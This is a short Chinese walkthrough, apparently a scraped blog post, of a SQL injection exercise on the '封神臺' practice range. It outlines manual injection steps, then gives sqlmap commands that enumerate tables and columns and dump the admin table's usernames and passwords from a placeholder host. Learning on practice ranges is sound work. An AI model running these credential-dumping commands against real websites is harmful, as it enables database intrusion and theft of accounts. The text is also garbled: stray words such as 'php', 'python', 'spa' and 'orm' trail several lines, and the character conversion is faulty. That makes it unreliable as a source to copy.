靶場地址:封神臺php
方法1、首先嚐試手工找注入點判斷python
查詢當前數據庫版本sql
絕大數狀況下,管理員的帳號密碼都在admin表裏數據庫
查出 admin 表裏 有 id username password 三個字段工具
limit 1,1 沒有回顯,說明只有一個用戶學習
sqlmap.py -u 「xxx:8003/index.php?id=1」
sqlmap.py -u 「xxx:8003/index.php?id=1」 --tables
根據猜解的表進行猜解表的字段spa
win: python sqlmap.py -u "xxx:8003/index.php?id=1" --columns -T admin
根據字段猜解內容code
sqlmap.py -u 「xxx.xxx.xxx.xxx:8003/index.php?id=1」 -D maoshe -T admin -C password,username --dump #-D 接數據庫名字 -T接表名 -C接要查的字段名稱逗號隔開 --dump 生成dump文件
爆出須要的字段orm